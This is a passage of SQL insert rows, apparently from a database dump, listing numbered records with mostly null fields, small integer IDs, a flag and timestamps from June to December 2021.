(172, NULL, NULL, 2054, 1, '2021-06-20 19:02:27'),
(173, NULL, NULL, 2059, 1, '2021-06-20 19:05:17'),
(174, NULL, NULL, 2064, 1, '2021-06-20 19:07:58'),
(175, NULL, NULL, 2055, 1, '2021-06-21 04:58:31'),
(176, NULL, NULL, 2063, 1, '2021-06-21 05:03:08'),
(177, NULL, NULL, 2062, 1, '2021-06-21 05:11:38'),
(178, NULL, NULL, 2060, 1, '2021-06-21 05:15:53'),
(179, NULL, NULL, 2061, 1, '2021-06-21 05:20:03'),
(180, NULL, NULL, 2059, 1, '2021-06-21 05:24:03'),
(181, NULL, NULL, 2064, 1, '2021-06-21 15:41:31'),
(182, NULL, NULL, 2058, 1, '2021-06-21 15:44:46'),
(183, NULL, NULL, 2055, 1, '2021-06-22 02:55:08'),
(184, NULL, NULL, 2061, 1, '2021-06-23 06:11:29'),
(185, NULL, NULL, 2058, 1, '2021-06-23 06:17:53'),
(186, NULL, NULL, 2063, 1, '2021-06-23 06:19:55'),
(187, NULL, NULL, 2062, 1, '2021-06-23 07:42:14'),
(188, NULL, NULL, 2054, 1, '2021-06-23 17:58:07'),
(189, NULL, NULL, 2062, 1, '2021-06-23 18:49:24'),
(190, NULL, NULL, 2060, 1, '2021-06-24 01:53:43'),
(191, NULL, NULL, 2060, 1, '2021-06-24 09:40:08'),
(192, NULL, NULL, 2063, 1, '2021-06-24 09:42:00'),
(193, NULL, NULL, 2058, 1, '2021-06-24 09:46:24'),
(194, NULL, NULL, 2055, 1, '2021-06-24 09:54:34'),
(195, NULL, NULL, 2061, 1, '2021-06-24 10:09:18'),
(196, NULL, NULL, 2062, 1, '2021-06-24 10:16:56'),
(197, NULL, NULL, 2054, 1, '2021-06-24 10:31:21'),
(198, NULL, NULL, 2059, 1, '2021-06-24 10:34:04'),
(199, NULL, NULL, 2064, 1, '2021-06-24 10:36:32'),
(200, NULL, NULL, 2053, 1, '2021-06-24 21:10:26'),
(201, NULL, NULL, 2060, 1, '2021-06-24 22:27:30'),
(202, NULL, NULL, 2063, 1, '2021-06-24 22:29:08'),
(203, NULL, NULL, 2058, 1, '2021-06-24 22:33:14'),
(204, NULL, NULL, 2055, 1, '2021-06-24 22:41:06'),
(205, NULL, NULL, 2061, 1, '2021-06-24 22:53:59'),
(206, NULL, NULL, 2062, 1, '2021-06-24 23:00:37'),
(207, NULL, NULL, 2064, 1, '2021-06-24 23:11:47'),
(208, NULL, NULL, 2054, 1, '2021-06-24 23:13:14'),
(209, NULL, NULL, 2059, 1, '2021-06-24 23:15:40'),
(210, NULL, NULL, 2064, 1, '2021-06-24 23:17:40'),
(211, NULL, NULL, 2059, 1, '2021-06-25 06:49:53'),
(212, NULL, NULL, 2060, 1, '2021-06-25 09:02:28'),
(213, NULL, NULL, 2063, 1, '2021-06-25 09:04:36'),
(214, NULL, NULL, 2058, 1, '2021-06-25 09:09:39'),
(215, NULL, NULL, 2055, 1, '2021-06-25 09:18:55'),
(216, NULL, NULL, 2061, 1, '2021-06-25 09:35:07'),
(217, NULL, NULL, 2062, 1, '2021-06-25 09:43:20'),
(218, NULL, NULL, 2054, 1, '2021-06-25 09:58:58'),
(219, NULL, NULL, 2059, 1, '2021-06-25 10:01:55'),
(220, NULL, NULL, 2064, 1, '2021-06-25 10:04:34'),
(221, NULL, NULL, 2053, 1, '2021-06-25 15:31:55'),
(222, NULL, NULL, 2060, 1, '2021-06-25 17:11:10'),
(223, NULL, NULL, 2063, 1, '2021-06-25 17:12:59'),
(224, NULL, NULL, 2058, 1, '2021-06-25 17:17:30'),
(225, NULL, NULL, 2055, 1, '2021-06-25 17:25:43'),
(226, NULL, NULL, 2061, 1, '2021-06-25 17:39:57'),
(227, NULL, NULL, 2062, 1, '2021-06-25 17:47:45'),
(228, NULL, NULL, 2054, 1, '2021-06-25 18:02:37'),
(229, NULL, NULL, 2059, 1, '2021-06-25 18:05:24'),
(230, NULL, NULL, 2064, 1, '2021-06-25 18:07:58'),
(231, NULL, NULL, 2054, 1, '2021-06-26 05:17:35'),
(232, NULL, NULL, 2060, 1, '2021-06-26 20:27:28'),
(233, NULL, NULL, 2063, 1, '2021-06-26 20:29:09'),
(234, NULL, NULL, 2058, 1, '2021-06-26 20:33:21'),
(235, NULL, NULL, 2055, 1, '2021-06-26 20:41:06'),
(236, NULL, NULL, 2061, 1, '2021-06-26 20:54:25'),
(237, NULL, NULL, 2062, 1, '2021-06-26 21:01:33'),
(238, NULL, NULL, 2054, 1, '2021-06-26 21:14:36'),
(239, NULL, NULL, 2059, 1, '2021-06-26 21:17:08'),
(240, NULL, NULL, 2064, 1, '2021-06-26 21:19:23'),
(241, NULL, NULL, 2060, 1, '2021-06-27 06:40:37'),
(242, NULL, NULL, 2063, 1, '2021-06-27 06:42:50'),
(243, NULL, NULL, 2058, 1, '2021-06-27 06:48:36'),
(244, NULL, NULL, 2055, 1, '2021-06-27 06:59:10'),
(245, NULL, NULL, 2061, 1, '2021-06-27 07:15:58'),
(246, NULL, NULL, 2062, 1, '2021-06-27 07:24:39'),
(247, NULL, NULL, 2054, 1, '2021-06-27 07:42:26'),
(248, NULL, NULL, 2059, 1, '2021-06-27 07:46:18'),
(249, NULL, NULL, 2064, 1, '2021-06-27 07:49:29'),
(250, 64, NULL, 2064, 1, '2021-06-27 11:44:59'),
(252, NULL, NULL, 2060, 1, '2021-06-27 16:25:37'),
(253, NULL, NULL, 2063, 1, '2021-06-27 16:27:42'),
(254, NULL, NULL, 2058, 1, '2021-06-27 16:32:32'),
(255, NULL, NULL, 2055, 1, '2021-06-27 16:41:25'),
(256, NULL, NULL, 2061, 1, '2021-06-27 16:56:23'),
(257, NULL, NULL, 2062, 1, '2021-06-27 17:04:04'),
(258, NULL, NULL, 2060, 1, '2021-06-27 20:43:49'),
(259, NULL, NULL, 2063, 1, '2021-06-27 20:45:37'),
(260, NULL, NULL, 2058, 1, '2021-06-27 20:50:26'),
(261, NULL, NULL, 2055, 1, '2021-06-27 20:59:21'),
(262, NULL, NULL, 2061, 1, '2021-06-27 21:14:20'),
(263, NULL, NULL, 2062, 1, '2021-06-27 21:22:26'),
(264, NULL, NULL, 2054, 1, '2021-06-27 21:37:58'),
(265, NULL, NULL, 2059, 1, '2021-06-27 21:41:25'),
(266, NULL, NULL, 2064, 1, '2021-06-27 21:44:22'),
(267, NULL, NULL, 2064, 1, '2021-06-28 01:05:30'),
(268, NULL, NULL, 2063, 1, '2021-06-28 01:05:33'),
(269, NULL, NULL, 2062, 1, '2021-06-28 01:05:34'),
(270, NULL, NULL, 2061, 1, '2021-06-28 01:05:36'),
(271, NULL, NULL, 2060, 1, '2021-06-28 01:05:37'),
(272, NULL, NULL, 2055, 1, '2021-06-28 01:05:38'),
(273, NULL, NULL, 2054, 1, '2021-06-28 01:05:39'),
(274, NULL, NULL, 2058, 1, '2021-06-28 01:05:50'),
(275, NULL, NULL, 2059, 1, '2021-06-28 01:05:52'),
(276, NULL, NULL, 2054, 1, '2021-06-28 17:40:46'),
(277, NULL, NULL, 2060, 1, '2021-06-28 18:06:52'),
(278, NULL, NULL, 2063, 1, '2021-06-28 18:08:38'),
(279, NULL, NULL, 2058, 1, '2021-06-28 18:13:22'),
(280, NULL, NULL, 2055, 1, '2021-06-28 18:21:55'),
(281, NULL, NULL, 2061, 1, '2021-06-28 18:35:56'),
(282, NULL, NULL, 2062, 1, '2021-06-28 18:43:15'),
(283, NULL, NULL, 2054, 1, '2021-06-28 18:57:57'),
(284, NULL, NULL, 2059, 1, '2021-06-28 19:00:56'),
(285, NULL, NULL, 2064, 1, '2021-06-28 19:03:26'),
(286, NULL, NULL, 2055, 1, '2021-06-29 04:31:47'),
(287, NULL, NULL, 2063, 1, '2021-06-29 04:34:06'),
(288, NULL, NULL, 2062, 1, '2021-06-29 04:36:36'),
(289, NULL, NULL, 2061, 1, '2021-06-29 04:38:59'),
(290, NULL, NULL, 2060, 1, '2021-06-29 04:41:17'),
(291, NULL, NULL, 2059, 1, '2021-06-29 04:43:39'),
(292, NULL, NULL, 2058, 1, '2021-06-29 05:00:21'),
(293, NULL, NULL, 2055, 1, '2021-06-29 15:22:28'),
(294, NULL, NULL, 2058, 1, '2021-06-29 15:24:35'),
(295, NULL, NULL, 2061, 1, '2021-10-15 18:55:30'),
(296, NULL, NULL, 2064, 1, '2021-10-15 20:23:56'),
(297, NULL, NULL, 2063, 1, '2021-10-15 20:24:08'),
(298, NULL, NULL, 2062, 1, '2021-10-15 20:24:20'),
(299, NULL, NULL, 2061, 1, '2021-10-15 20:24:31'),
(300, NULL, NULL, 2060, 1, '2021-10-15 20:24:42'),
(301, NULL, NULL, 2059, 1, '2021-10-15 20:24:54'),
(302, NULL, NULL, 2058, 1, '2021-10-15 20:25:06'),
(303, NULL, NULL, 2055, 1, '2021-10-15 20:25:19'),
(304, NULL, NULL, 2054, 1, '2021-10-15 20:25:31'),
(305, NULL, NULL, 2053, 1, '2021-10-15 20:40:59'),
(306, NULL, NULL, 2054, 1, '2021-10-15 22:17:02'),
(307, NULL, NULL, 2060, 1, '2021-10-15 22:17:04'),
(308, NULL, NULL, 2061, 1, '2021-10-15 22:17:07'),
(309, NULL, NULL, 2059, 1, '2021-10-15 22:17:10'),
(310, NULL, NULL, 2064, 1, '2021-10-15 22:17:13'),
(311, NULL, NULL, 2062, 1, '2021-10-15 22:17:15'),
(312, NULL, NULL, 2055, 1, '2021-10-15 22:17:18'),
(313, NULL, NULL, 2063, 1, '2021-10-15 22:17:20'),
(314, NULL, NULL, 2058, 1, '2021-10-15 22:17:23'),
(315, NULL, NULL, 2058, 1, '2021-10-16 12:58:49'),
(316, NULL, NULL, 2063, 1, '2021-10-16 22:09:33'),
(317, NULL, NULL, 2055, 1, '2021-10-17 08:02:31'),
(318, NULL, NULL, 2063, 1, '2021-10-17 18:16:03'),
(319, NULL, NULL, 2061, 1, '2021-10-17 20:36:17'),
(320, NULL, NULL, 2059, 1, '2021-10-18 12:33:08'),
(321, NULL, NULL, 2063, 1, '2021-10-18 14:12:20'),
(322, NULL, NULL, 2061, 1, '2021-10-18 16:07:29'),
(323, NULL, NULL, 2058, 1, '2021-10-18 22:43:35'),
(324, NULL, NULL, 2063, 1, '2021-10-19 07:29:09'),
(325, NULL, NULL, 2061, 1, '2021-10-19 09:24:49'),
(326, NULL, NULL, 2063, 1, '2021-10-19 15:30:16'),
(327, NULL, NULL, 2058, 1, '2021-10-19 19:13:12'),
(328, NULL, NULL, 2063, 1, '2021-10-20 08:40:36'),
(329, NULL, NULL, 2054, 1, '2021-10-20 10:46:17'),
(330, NULL, NULL, 2058, 1, '2021-10-20 12:24:39'),
(331, NULL, NULL, 2061, 1, '2021-10-20 17:28:05'),
(332, NULL, NULL, 2061, 1, '2021-10-20 17:33:27'),
(333, NULL, NULL, 2064, 1, '2021-10-21 01:34:22'),
(334, NULL, NULL, 2063, 1, '2021-10-21 10:25:23'),
(335, NULL, NULL, 2060, 1, '2021-10-21 21:49:52'),
(336, NULL, NULL, 2054, 1, '2021-10-22 13:46:17'),
(337, NULL, NULL, 2055, 1, '2021-10-22 13:46:21'),
(338, NULL, NULL, 2064, 1, '2021-10-22 13:46:32'),
(339, NULL, NULL, 2063, 1, '2021-10-22 13:46:35'),
(340, NULL, NULL, 2062, 1, '2021-10-22 13:46:39'),
(341, NULL, NULL, 2060, 1, '2021-10-22 13:46:41'),
(342, NULL, NULL, 2059, 1, '2021-10-22 13:46:45'),
(343, NULL, NULL, 2061, 1, '2021-10-22 13:46:48'),
(344, NULL, NULL, 2058, 1, '2021-10-22 13:46:51'),
(345, NULL, NULL, 2053, 1, '2021-10-22 18:18:50'),
(346, NULL, NULL, 2064, 1, '2021-10-24 01:39:06'),
(347, NULL, NULL, 2063, 1, '2021-10-24 04:06:16'),
(348, NULL, NULL, 2063, 1, '2021-10-25 08:42:52'),
(349, NULL, NULL, 2058, 1, '2021-10-27 18:32:54'),
(350, NULL, NULL, 2058, 1, '2021-10-28 04:40:29'),
(351, NULL, NULL, 2064, 1, '2021-10-28 10:07:53'),
(352, NULL, NULL, 2062, 1, '2021-10-29 14:10:27'),
(353, NULL, NULL, 2064, 1, '2021-10-29 15:24:19'),
(354, NULL, NULL, 2055, 1, '2021-10-29 16:51:39'),
(355, NULL, NULL, 2061, 1, '2021-10-30 02:55:50'),
(356, NULL, NULL, 2061, 1, '2021-10-30 04:25:48'),
(357, NULL, NULL, 2060, 1, '2021-10-30 09:48:13'),
(358, NULL, NULL, 2063, 1, '2021-10-30 09:48:15'),
(359, NULL, NULL, 2058, 1, '2021-10-30 09:48:18'),
(360, NULL, NULL, 2055, 1, '2021-10-30 09:48:24'),
(361, NULL, NULL, 2061, 1, '2021-10-30 09:48:33'),
(362, NULL, NULL, 2062, 1, '2021-10-30 09:48:42'),
(363, NULL, NULL, 2054, 1, '2021-10-30 09:48:51'),
(364, NULL, NULL, 2059, 1, '2021-10-30 09:48:54'),
(365, NULL, NULL, 2064, 1, '2021-10-30 09:48:57'),
(366, NULL, NULL, 2060, 1, '2021-10-30 10:41:10'),
(367, NULL, NULL, 2063, 1, '2021-10-30 10:41:13'),
(368, NULL, NULL, 2058, 1, '2021-10-30 10:41:15'),
(369, NULL, NULL, 2055, 1, '2021-10-30 10:41:21'),
(370, NULL, NULL, 2061, 1, '2021-10-30 10:41:29'),
(371, NULL, NULL, 2062, 1, '2021-10-30 10:41:34'),
(372, NULL, NULL, 2054, 1, '2021-10-30 10:41:42'),
(373, NULL, NULL, 2059, 1, '2021-10-30 10:41:46'),
(374, NULL, NULL, 2064, 1, '2021-10-30 10:41:48'),
(375, NULL, NULL, 2061, 1, '2021-10-30 13:19:59'),
(376, NULL, NULL, 2060, 1, '2021-10-30 16:45:30'),
(377, NULL, NULL, 2064, 1, '2021-10-30 22:51:17'),
(378, NULL, NULL, 2058, 1, '2021-10-30 22:51:24'),
(379, NULL, NULL, 2059, 1, '2021-10-30 22:51:26'),
(380, NULL, NULL, 2060, 1, '2021-10-30 22:51:27'),
(381, NULL, NULL, 2061, 1, '2021-10-30 22:51:29'),
(382, NULL, NULL, 2062, 1, '2021-10-30 22:51:31'),
(383, NULL, NULL, 2063, 1, '2021-10-30 22:51:32'),
(384, NULL, NULL, 2055, 1, '2021-10-30 22:51:34'),
(385, NULL, NULL, 2054, 1, '2021-10-30 22:51:42'),
(386, NULL, NULL, 2061, 1, '2021-10-30 23:42:06'),
(387, NULL, NULL, 2061, 1, '2021-10-31 00:27:07'),
(388, NULL, NULL, 2059, 1, '2021-11-01 22:49:33'),
(389, NULL, NULL, 2063, 1, '2021-11-01 23:47:16'),
(390, NULL, NULL, 2058, 1, '2021-11-02 19:02:52'),
(391, NULL, NULL, 2058, 1, '2021-11-02 21:36:59'),
(392, NULL, NULL, 2064, 1, '2021-11-03 08:07:14'),
(393, NULL, NULL, 2054, 1, '2021-11-03 15:34:29'),
(394, NULL, NULL, 2061, 1, '2021-11-03 20:47:48'),
(395, NULL, NULL, 2054, 1, '2021-11-04 00:00:10'),
(396, NULL, NULL, 2061, 1, '2021-11-04 12:28:15'),
(397, NULL, NULL, 2055, 1, '2021-11-04 16:51:58'),
(398, NULL, NULL, 2061, 1, '2021-11-04 17:37:53'),
(399, NULL, NULL, 2059, 1, '2021-11-04 18:58:58'),
(400, NULL, NULL, 2061, 1, '2021-11-04 21:23:35'),
(401, NULL, NULL, 2060, 1, '2021-11-04 21:29:58'),
(402, NULL, NULL, 2061, 1, '2021-11-05 04:23:22'),
(403, NULL, NULL, 2058, 1, '2021-11-05 04:23:25'),
(404, NULL, NULL, 2054, 1, '2021-11-05 04:23:26'),
(405, NULL, NULL, 2060, 1, '2021-11-05 04:23:33'),
(406, NULL, NULL, 2059, 1, '2021-11-05 04:23:36'),
(407, NULL, NULL, 2062, 1, '2021-11-05 04:23:39'),
(408, NULL, NULL, 2055, 1, '2021-11-05 04:23:40'),
(409, NULL, NULL, 2064, 1, '2021-11-05 04:23:42'),
(410, NULL, NULL, 2063, 1, '2021-11-05 04:23:47'),
(411, NULL, NULL, 2061, 1, '2021-11-05 08:02:36'),
(412, NULL, NULL, 2061, 1, '2021-11-05 15:03:11'),
(413, NULL, NULL, 2064, 1, '2021-11-05 15:30:35'),
(414, NULL, NULL, 2061, 1, '2021-11-05 17:45:22'),
(415, NULL, NULL, 2061, 1, '2021-11-06 02:28:58'),
(416, 81, NULL, 2064, 1, '2021-11-06 09:09:18'),
(420, NULL, NULL, 2061, 1, '2021-11-06 12:41:25'),
(421, NULL, NULL, 2061, 1, '2021-11-06 23:15:11'),
(422, NULL, NULL, 2061, 1, '2021-11-07 07:25:15'),
(423, NULL, NULL, 2058, 1, '2021-11-07 09:11:35'),
(424, NULL, NULL, 2062, 1, '2021-11-07 12:28:23'),
(425, NULL, NULL, 2054, 1, '2021-11-07 14:24:07'),
(426, NULL, NULL, 2061, 1, '2021-11-07 15:14:52'),
(427, NULL, NULL, 2058, 1, '2021-11-07 19:54:21'),
(428, NULL, NULL, 2061, 1, '2021-11-08 02:10:17'),
(429, NULL, NULL, 2058, 1, '2021-11-08 20:41:38'),
(430, NULL, NULL, 2060, 1, '2021-11-09 02:21:19'),
(431, NULL, NULL, 2063, 1, '2021-11-09 02:21:23'),
(432, NULL, NULL, 2058, 1, '2021-11-09 02:21:25'),
(433, NULL, NULL, 2055, 1, '2021-11-09 02:21:33'),
(434, NULL, NULL, 2061, 1, '2021-11-09 02:21:41'),
(435, NULL, NULL, 2062, 1, '2021-11-09 02:21:51'),
(436, NULL, NULL, 2054, 1, '2021-11-09 02:22:00'),
(437, NULL, NULL, 2059, 1, '2021-11-09 02:22:03'),
(438, NULL, NULL, 2064, 1, '2021-11-09 02:22:06'),
(439, NULL, NULL, 2064, 1, '2021-11-09 19:29:24'),
(440, NULL, NULL, 2058, 1, '2021-11-09 19:56:13'),
(441, NULL, NULL, 2064, 1, '2021-11-09 19:56:23'),
(442, NULL, NULL, 2062, 1, '2021-11-09 19:56:37'),
(443, NULL, NULL, 2055, 1, '2021-11-09 19:56:39'),
(444, NULL, NULL, 2059, 1, '2021-11-09 19:56:48'),
(445, NULL, NULL, 2063, 1, '2021-11-09 19:56:51'),
(446, NULL, NULL, 2061, 1, '2021-11-09 19:56:52'),
(447, NULL, NULL, 2060, 1, '2021-11-09 19:56:58'),
(448, NULL, NULL, 2054, 1, '2021-11-09 19:57:05'),
(449, NULL, NULL, 2058, 1, '2021-11-09 19:58:44'),
(450, NULL, NULL, 2064, 1, '2021-11-09 19:58:53'),
(451, NULL, NULL, 2062, 1, '2021-11-09 19:59:00'),
(452, NULL, NULL, 2055, 1, '2021-11-09 19:59:02'),
(453, NULL, NULL, 2059, 1, '2021-11-09 19:59:07'),
(454, NULL, NULL, 2063, 1, '2021-11-09 19:59:08'),
(455, NULL, NULL, 2061, 1, '2021-11-09 19:59:09'),
(456, NULL, NULL, 2060, 1, '2021-11-09 19:59:17'),
(457, NULL, NULL, 2054, 1, '2021-11-09 19:59:20'),
(458, NULL, NULL, 2053, 1, '2021-11-09 19:59:50'),
(459, NULL, NULL, 2055, 1, '2021-11-09 21:21:46'),
(460, NULL, NULL, 2055, 1, '2021-11-09 23:57:04'),
(461, NULL, NULL, 2058, 1, '2021-11-10 13:49:23'),
(462, NULL, NULL, 2059, 1, '2021-11-10 15:08:15'),
(463, NULL, NULL, 2059, 1, '2021-11-10 15:30:45'),
(464, NULL, NULL, 2064, 1, '2021-11-11 00:05:56'),
(465, NULL, NULL, 2053, 1, '2021-11-11 01:23:29'),
(466, NULL, NULL, 2061, 1, '2021-11-12 00:42:52'),
(467, NULL, NULL, 2061, 1, '2021-11-12 18:05:36'),
(468, NULL, NULL, 2061, 1, '2021-11-13 08:24:29'),
(469, NULL, NULL, 2061, 1, '2021-11-14 00:32:42'),
(470, NULL, NULL, 2058, 1, '2021-11-14 01:45:50'),
(471, NULL, NULL, 2064, 1, '2021-11-14 14:49:53'),
(472, NULL, NULL, 2058, 1, '2021-11-14 18:07:39'),
(473, NULL, NULL, 2064, 1, '2021-11-14 22:06:44'),
(474, NULL, NULL, 2060, 1, '2021-11-15 04:43:16'),
(475, NULL, NULL, 2063, 1, '2021-11-15 04:43:20'),
(476, NULL, NULL, 2058, 1, '2021-11-15 04:43:22'),
(477, NULL, NULL, 2055, 1, '2021-11-15 04:43:29'),
(478, NULL, NULL, 2061, 1, '2021-11-15 04:43:37'),
(479, NULL, NULL, 2062, 1, '2021-11-15 04:43:48'),
(480, NULL, NULL, 2054, 1, '2021-11-15 04:43:56'),
(481, NULL, NULL, 2059, 1, '2021-11-15 04:44:00'),
(482, NULL, NULL, 2064, 1, '2021-11-15 04:44:02'),
(483, NULL, NULL, 2064, 1, '2021-11-15 08:16:36'),
(484, NULL, NULL, 2061, 1, '2021-11-16 04:09:44'),
(485, NULL, NULL, 2059, 1, '2021-11-16 04:09:49'),
(486, NULL, NULL, 2064, 1, '2021-11-16 15:53:53'),
(487, NULL, NULL, 2060, 1, '2021-11-16 20:55:31'),
(488, NULL, NULL, 2058, 1, '2021-11-17 12:49:32'),
(489, NULL, NULL, 2060, 1, '2021-11-17 12:49:38'),
(490, NULL, NULL, 2064, 1, '2021-11-17 12:49:41'),
(491, NULL, NULL, 2062, 1, '2021-11-17 12:49:46'),
(492, NULL, NULL, 2054, 1, '2021-11-17 17:49:13'),
(493, NULL, NULL, 2059, 1, '2021-11-17 22:26:20'),
(494, NULL, NULL, 2062, 1, '2021-11-18 06:23:05'),
(495, NULL, NULL, 2063, 1, '2021-11-18 07:27:56'),
(496, NULL, NULL, 2060, 1, '2021-11-18 23:11:53'),
(497, NULL, NULL, 2059, 1, '2021-11-19 06:57:29'),
(498, NULL, NULL, 2064, 1, '2021-11-19 09:41:04'),
(499, NULL, NULL, 2063, 1, '2021-11-19 14:25:53'),
(500, NULL, NULL, 2055, 1, '2021-11-20 05:23:12'),
(501, NULL, NULL, 2061, 1, '2021-11-20 11:55:30'),
(502, NULL, NULL, 2058, 1, '2021-11-20 12:21:26'),
(503, NULL, NULL, 2064, 1, '2021-11-20 12:47:22'),
(504, 98, NULL, 2064, 1, '2021-11-20 19:01:35'),
(507, NULL, NULL, 2060, 1, '2021-11-20 19:14:53'),
(508, NULL, NULL, 2063, 1, '2021-11-20 19:14:55'),
(509, NULL, NULL, 2058, 1, '2021-11-20 19:14:58'),
(510, NULL, NULL, 2055, 1, '2021-11-20 19:15:05'),
(511, NULL, NULL, 2061, 1, '2021-11-20 19:15:15'),
(512, NULL, NULL, 2062, 1, '2021-11-20 19:15:21'),
(513, NULL, NULL, 2054, 1, '2021-11-20 19:15:30'),
(514, NULL, NULL, 2059, 1, '2021-11-20 19:15:33'),
(515, NULL, NULL, 2064, 1, '2021-11-20 19:15:36'),
(516, NULL, NULL, 2054, 1, '2021-11-21 01:36:59'),
(517, NULL, NULL, 2058, 1, '2021-11-21 12:25:36'),
(518, NULL, NULL, 2064, 1, '2021-11-21 16:48:28'),
(519, NULL, NULL, 2055, 1, '2021-11-21 20:35:03'),
(520, NULL, NULL, 2058, 1, '2021-11-22 00:24:19'),
(521, NULL, NULL, 2058, 1, '2021-11-22 02:34:42'),
(522, NULL, NULL, 2060, 1, '2021-11-22 05:44:31'),
(523, NULL, NULL, 2055, 1, '2021-11-22 23:21:11'),
(524, NULL, NULL, 2058, 1, '2021-11-24 18:25:49'),
(525, NULL, NULL, 2055, 1, '2021-11-25 01:45:43'),
(526, NULL, NULL, 2053, 1, '2021-11-25 03:17:43'),
(527, NULL, NULL, 2061, 1, '2021-11-25 20:20:59'),
(528, NULL, NULL, 2061, 1, '2021-11-26 05:55:36'),
(529, NULL, NULL, 2061, 1, '2021-11-26 16:43:08'),
(530, NULL, NULL, 2055, 1, '2021-11-26 19:42:21'),
(531, NULL, NULL, 2058, 1, '2021-11-27 00:58:23'),
(532, NULL, NULL, 2064, 1, '2021-11-27 08:47:07'),
(533, NULL, NULL, 2064, 1, '2021-11-27 12:00:12'),
(534, NULL, NULL, 2062, 1, '2021-11-27 12:00:20'),
(535, NULL, NULL, 2063, 1, '2021-11-27 12:00:25'),
(536, NULL, NULL, 2058, 1, '2021-11-27 20:21:09'),
(537, NULL, NULL, 2064, 1, '2021-11-27 21:01:22'),
(538, NULL, NULL, 2054, 1, '2021-11-28 11:42:06'),
(539, NULL, NULL, 2055, 1, '2021-11-28 19:45:41'),
(540, NULL, NULL, 2055, 1, '2021-11-28 22:16:08'),
(541, NULL, NULL, 2060, 1, '2021-11-28 23:00:57'),
(542, NULL, NULL, 2061, 1, '2021-11-29 12:10:37'),
(543, NULL, NULL, 2054, 1, '2021-11-30 11:40:41'),
(544, NULL, NULL, 2055, 1, '2021-11-30 12:24:54'),
(545, NULL, NULL, 2054, 1, '2021-11-30 18:02:36'),
(546, NULL, NULL, 2055, 1, '2021-11-30 18:02:39'),
(547, NULL, NULL, 2064, 1, '2021-11-30 18:02:51'),
(548, NULL, NULL, 2063, 1, '2021-11-30 18:02:54'),
(549, NULL, NULL, 2062, 1, '2021-11-30 18:02:57'),
(550, NULL, NULL, 2060, 1, '2021-11-30 18:03:00'),
(551, NULL, NULL, 2059, 1, '2021-11-30 18:03:04'),
(552, NULL, NULL, 2061, 1, '2021-11-30 18:03:07'),
(553, NULL, NULL, 2058, 1, '2021-11-30 18:03:10'),
(554, NULL, NULL, 2053, 1, '2021-12-01 02:45:03'),
(555, NULL, NULL, 2063, 1, '2021-12-01 09:04:52'),
(556, NULL, NULL, 2061, 1, '2021-12-02 05:44:30'),
(557, NULL, NULL, 2058, 1, '2021-12-02 07:33:42'),
(558, NULL, NULL, 2064, 1, '2021-12-02 08:36:14'),
(559, NULL, NULL, 2063, 1, '2021-12-02 16:12:33'),
(560, NULL, NULL, 2059, 1, '2021-12-02 22:20:20'),
(561, NULL, NULL, 2061, 1, '2021-12-03 01:45:17'),
(562, 119, NULL, 2064, 1, '2021-12-03 09:59:15'),
(565, NULL, NULL, 2061, 1, '2021-12-03 16:00:57'),
(566, NULL, NULL, 2064, 1, '2021-12-03 16:12:18'),
(567, NULL, NULL, 2055, 1, '2021-12-03 16:23:39'),
(568, NULL, NULL, 2058, 1, '2021-12-03 16:35:00'),
(569, NULL, NULL, 2058, 1, '2021-12-04 02:53:54'),
(570, NULL, NULL, 2055, 1, '2021-12-04 13:13:17'),
(571, NULL, NULL, 2060, 1, '2021-12-04 22:30:24'),
(572, NULL, NULL, 2061, 1, '2021-12-05 21:54:59'),
(573, NULL, NULL, 2055, 1, '2021-12-06 17:47:58'),
(574, NULL, NULL, 2058, 1, '2021-12-06 18:50:31'),
(575, NULL, NULL, 2060, 1, '2021-12-07 01:01:09'),
(576, NULL, NULL, 2061, 1, '2021-12-08 04:00:28'),
(577, NULL, NULL, 2054, 1, '2021-12-08 16:46:17'),
(578, NULL, NULL, 2064, 1, '2021-12-08 20:38:30'),
(579, NULL, NULL, 2062, 1, '2021-12-08 20:39:49'),
(580, NULL, NULL, 2063, 1, '2021-12-08 20:40:12'),
(581, NULL, NULL, 2061, 1, '2021-12-08 20:40:21'),
(582, NULL, NULL, 2059, 1, '2021-12-08 20:40:29'),
(583, NULL, NULL, 2058, 1, '2021-12-08 20:40:38'),
(584, NULL, NULL, 2055, 1, '2021-12-08 20:41:01'),
(585, NULL, NULL, 2054, 1, '2021-12-08 20:41:10'),
(586, NULL, NULL, 2060, 1, '2021-12-08 20:41:39'),
(587, NULL, NULL, 2064, 1, '2021-12-09 01:41:23'),
(588, NULL, NULL, 2053, 1, '2021-12-09 03:53:00'),
(589, NULL, NULL, 2055, 1, '2021-12-09 04:54:17'),
(590, NULL, NULL, 2055, 1, '2021-12-09 05:30:40'),
(591, NULL, NULL, 2064, 1, '2021-12-10 08:11:39'),
(592, NULL, NULL, 2059, 1, '2021-12-10 16:21:36'),
(593, NULL, NULL, 2059, 1, '2021-12-10 17:06:38'),
(594, NULL, NULL, 2059, 1, '2021-12-11 04:48:09'),
(595, NULL, NULL, 2061, 1, '2021-12-11 04:49:06'),
(596, NULL, NULL, 2061, 1, '2021-12-11 06:10:20'),
(597, NULL, NULL, 2058, 1, '2021-12-11 16:42:50'),
(598, NULL, NULL, 2055, 1, '2021-12-11 18:30:45'),
(599, NULL, NULL, 2055, 1, '2021-12-12 05:35:36'),
(600, NULL, NULL, 2064, 1, '2021-12-12 09:22:34'),
(601, NULL, NULL, 2064, 1, '2021-12-13 00:14:22'),
(602, NULL, NULL, 2064, 1, '2021-12-13 13:24:58'),
(603, NULL, NULL, 2059, 1, '2021-12-14 12:22:36'),
(604, NULL, NULL, 2064, 1, '2021-12-14 12:45:36'),
(605, NULL, NULL, 2055, 1, '2021-12-14 13:32:01'),
(606, NULL, NULL, 2063, 1, '2021-12-14 15:11:45'),
(607, NULL, NULL, 2054, 1, '2021-12-14 19:25:33'),
(608, NULL, NULL, 2060, 1, '2021-12-15 01:19:55'),
(609, NULL, NULL, 2064, 1, '2021-12-15 03:33:59'),
(610, NULL, NULL, 2058, 1, '2021-12-15 20:22:58'),
(611, NULL, NULL, 2058, 1, '2021-12-15 23:24:59'),
(612, NULL, NULL, 2055, 1, '2021-12-16 16:27:35'),
(613, NULL, NULL, 2054, 1, '2021-12-16 20:02:30'),
(614, NULL, NULL, 2064, 1, '2021-12-17 04:41:24'),
(615, NULL, NULL, 2058, 1, '2021-12-17 21:28:17'),
(616, NULL, NULL, 2059, 1, '2021-12-17 23:51:32'),
(617, NULL, NULL, 2055, 1, '2021-12-18 15:41:09'),
(618, NULL, NULL, 2064, 1, '2021-12-19 02:11:57'),
(619, NULL, NULL, 2062, 1, '2021-12-19 02:13:24'),
(620, NULL, NULL, 2063, 1, '2021-12-19 02:13:50'),
